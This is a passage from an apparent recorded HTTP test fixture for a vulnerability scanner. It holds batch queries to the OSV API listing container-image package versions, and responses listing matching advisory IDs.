"id": "ALPINE-CVE-2025-69419", "modified": "2026-02-08T14:17:23.481787Z" }, { "id": "ALPINE-CVE-2025-69420", "modified": "2026-02-08T14:17:16.244540Z" }, { "id": "ALPINE-CVE-2025-69421", "modified": "2026-02-08T14:17:06.852172Z" }, { "id": "ALPINE-CVE-2026-22795", "modified": "2026-02-08T14:17:23.817021Z" }, { "id": "ALPINE-CVE-2026-22796", "modified": "2026-02-08T14:17:23.708503Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "2365" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 2279 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.20", "name": "alpine-baselayout" }, "version": "3.6.5-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "alpine-baselayout" }, "version": "3.6.5-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "apk-tools" }, "version": "2.14.4-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "busybox" }, "version": "1.36.1-r29" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "busybox" }, "version": "1.36.1-r29" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "ca-certificates" }, "version": "20240226-r0" }, { "package": { "ecosystem": "Go", "name": "github.com/BurntSushi/toml" }, "version": "1.4.0" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.22.4" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "openssl" }, "version": "3.3.1-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "openssl" }, "version": "3.3.1-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "musl" }, "version": "1.2.5-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "musl" }, "version": "1.2.5-r0" }, { "package": { "ecosystem": "Go", "name": "ptf" }, "version": "(devel)" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "pax-utils" }, "version": "1.3.7-r2" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "busybox" }, "version": "1.36.1-r29" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "zlib" }, "version": "1.3.1-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage_JSONFormat/scanning_image_with_go_binary url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 5308 body: | { "results": [ {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, {}, { "vulns": [ { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-12797", "modified": "2025-12-03T22:55:03.634026Z" }, { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-15467", "modified": "2026-02-26T11:16:44.405477Z" }, { "id": "ALPINE-CVE-2025-15468", "modified": "2026-01-30T11:17:10.087231Z" }, { "id": "ALPINE-CVE-2025-66199", "modified": "2026-01-30T11:16:38.617961Z" }, { "id": "ALPINE-CVE-2025-68160", "modified": "2026-02-08T14:17:20.369697Z" }, { "id": "ALPINE-CVE-2025-69418", "modified": "2026-02-08T14:17:22.909725Z" }, { "id": "ALPINE-CVE-2025-69419", "modified": "2026-02-08T14:17:23.481787Z" }, { "id": "ALPINE-CVE-2025-69420", "modified": "2026-02-08T14:17:16.244540Z" }, { "id": "ALPINE-CVE-2025-69421", "modified": "2026-02-08T14:17:06.852172Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9231", "modified": "2025-12-03T23:00:26.184987Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" }, { "id": "ALPINE-CVE-2026-22795", "modified": "2026-02-08T14:17:23.817021Z" }, { "id": "ALPINE-CVE-2026-22796", "modified": "2026-02-08T14:17:23.708503Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-12797", "modified": "2025-12-03T22:55:03.634026Z" }, { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-15467", "modified": "2026-02-26T11:16:44.405477Z" }, { "id": "ALPINE-CVE-2025-15468", "modified": "2026-01-30T11:17:10.087231Z" }, { "id": "ALPINE-CVE-2025-66199", "modified": "2026-01-30T11:16:38.617961Z" }, { "id": "ALPINE-CVE-2025-68160", "modified": "2026-02-08T14:17:20.369697Z" }, { "id": "ALPINE-CVE-2025-69418", "modified": "2026-02-08T14:17:22.909725Z" }, { "id": "ALPINE-CVE-2025-69419", "modified": "2026-02-08T14:17:23.481787Z" }, { "id": "ALPINE-CVE-2025-69420", "modified": "2026-02-08T14:17:16.244540Z" }, { "id": "ALPINE-CVE-2025-69421", "modified": "2026-02-08T14:17:06.852172Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9231", "modified": "2025-12-03T23:00:26.184987Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" }, { "id": "ALPINE-CVE-2026-22795", "modified": "2026-02-08T14:17:23.817021Z" }, { "id": "ALPINE-CVE-2026-22796", "modified": "2026-02-08T14:17:23.708503Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {} ] } headers: Content-Length: - "5308" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1907 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "apk-tools" }, "version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "zlib" }, "version": "1.2.11-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage_JSONFormat/scanning_insecure_alpine_image_with_detector_preset url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 136 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "136" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1907 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "apk-tools" }, "version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "zlib" }, "version": "1.2.11-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage_JSONFormat/scanning_insecure_alpine_image_with_specific_detector_enabled url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 136 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "136" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 2701 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "apk-tools" }, "version": "2.14.0-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "ca-certificates" }, "version": "20230506-r0" }, { "package": { "ecosystem": "npm", "name": "cryo" }, "version": "0.0.6" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "libc-dev" }, "version": "0.7.2-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "npm", "name": "minimist" }, "version": "0.0.8" }, { "package": { "ecosystem": "npm", "name": "mkdirp" }, "version": "0.5.0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "pax-utils" }, "version": "1.3.7-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "zlib" }, "version": "1.3.1-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage_JSONFormat/scanning_node_modules_using_npm_with_some_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2922 body: | { "results": [ {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, { "vulns": [ { "id": "GHSA-38f5-ghc2-fcmv", "modified": "2023-11-08T04:00:20.055238Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, { "vulns": [ { "id": "GHSA-vh95-rmgr-6w4m", "modified": "2026-03-13T22:11:31.390433Z" }, { "id": "GHSA-xvch-5gv4-984h", "modified": "2026-03-13T22:11:59.523514Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {} ] } headers: Content-Length: - "2922" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 14065 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Ubuntu:22.04", "name": "adduser" }, "version": "3.118ubuntu5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "apt" }, "version": "2.4.13" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "base-files" }, "version": "12ubuntu4.7" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "base-passwd" }, "version": "3.5.52build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "bash" }, "version": "5.1-6ubuntu1.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "1:2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "coreutils" }, "version": "8.32-4.1ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "dash" }, "version": "0.5.11+git20210903+057cd650a4ed-3build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "debconf" }, "version": "1.5.79ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "debianutils" }, "version": "5.5-1ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "diffutils" }, "version": "1:3.8-0ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "dpkg" }, "version": "1.21.1ubuntu2.3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "findutils" }, "version": "4.8.0-1ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gnupg2" }, "version": "2.2.27-3ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "grep" }, "version": "3.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gzip" }, "version": "1.10-4ubuntu4.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "hostname" }, "version": "3.23ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "init-system-helpers" }, "version": "1.62" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "acl" }, "version": "2.3.1-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "apt" }, "version": "2.4.13" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "attr" }, "version": "1:2.5.1-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "audit" }, "version": "1:3.0.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "audit" }, "version": "1:3.0.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "bzip2" }, "version": "1.0.8-5build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "glibc" }, "version": "2.35-0ubuntu3.8" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "glibc" }, "version": "2.35-0ubuntu3.8" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libcap-ng" }, "version": "0.7.9-2.2build3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libcap2" }, "version": "1:2.44-1ubuntu0.22.04.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libxcrypt" }, "version": "1:4.4.27-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "db5.3" }, "version": "5.3.28+dfsg1-0.8ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "cdebconf" }, "version": "0.261ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libffi" }, "version": "3.4.2-4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libgcrypt20" }, "version": "1.9.4-3ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gmp" }, "version": "2:6.2.1+dfsg-3ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gnutls28" }, "version": "3.7.3-4ubuntu1.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libgpg-error" }, "version": "1.43-3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "nettle" }, "version": "3.7.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libidn2" }, "version": "2.3.2-2build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "keyutils" }, "version": "1.6.1-2ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "lz4" }, "version": "1.9.3-2build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "xz-utils" }, "version": "5.2.5-2ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "nettle" }, "version": "3.7.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libnsl" }, "version": "1.3.0-2build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "p11-kit" }, "version": "0.24.0-6build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pcre2" }, "version": "10.39-3ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pcre3" }, "version": "2:8.39-13ubuntu0.22.04.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "procps" }, "version": "2:3.3.17-6ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libseccomp" }, "version": "2.5.3-2ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libselinux" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsemanage" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsemanage" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsepol" }, "version": "3.3-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "openssl" }, "version": "3.0.2-0ubuntu1.18" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "systemd" }, "version": "249.11-0ubuntu3.12" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtasn1-6" }, "version": "4.18.0-4build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtirpc" }, "version": "1.3.2-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtirpc" }, "version": "1.3.2-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "systemd" }, "version": "249.11-0ubuntu3.12" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libunistring" }, "version": "1.0-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "xxhash" }, "version": "0.8.1-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libzstd" }, "version": "1.4.8+dfsg-3build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "shadow" }, "version": "1:4.8.1-2ubuntu2.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "lsb" }, "version": "11.1.0ubuntu4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "mawk" }, "version": "1.3.4.20200120-3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, 